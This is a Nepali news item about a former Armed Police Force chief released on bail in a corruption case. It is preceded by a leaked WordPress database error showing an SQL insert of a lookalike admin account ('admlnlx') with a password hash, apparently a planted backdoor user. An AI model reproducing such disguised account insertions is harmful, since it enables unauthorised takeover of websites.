WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTQW8gn.uvst3rsq2fXjr1eika.Nq20', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 11:27:07', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस १२ –
आफूले गैरकानुनी रुपमा लाभ लिई सरकारलाई हानी पुर्याएको आरोपको मुद्दामा माग गरेबमोजिमको ३० लाख रुपैयाँ धरौटी राखेर सशस्त्र प्रहरी बलका पूर्वमहानिरीक्षक वासुदेव ओली सोमबार थुनामुक्त भएका छन् ।
विशेष अदालतका सदस्यहरु भूपेन्द्रप्रसाद राई, नरेन्द्रकुमार शिवाकोटी र प्रभा बस्नेतको इजलासले ओलीसँग तीस लाख रुपैयाँ नगद वा जेथा लिई थुनामुक्त गर्न र नदिएमा थुनामा पठाउन उल्लेख गरिएको थियो ।
पूर्वमहानिरीक्षक ओलीबाट १ करोड १४ लाख ५४ हजार ४९ रुपैयाँ ५० पैसा भ्रष्टाचार भएको अख्तियारले दाबी गरेको छ । नेपाल समाचारपत्र दैनिकमा खबर छ ।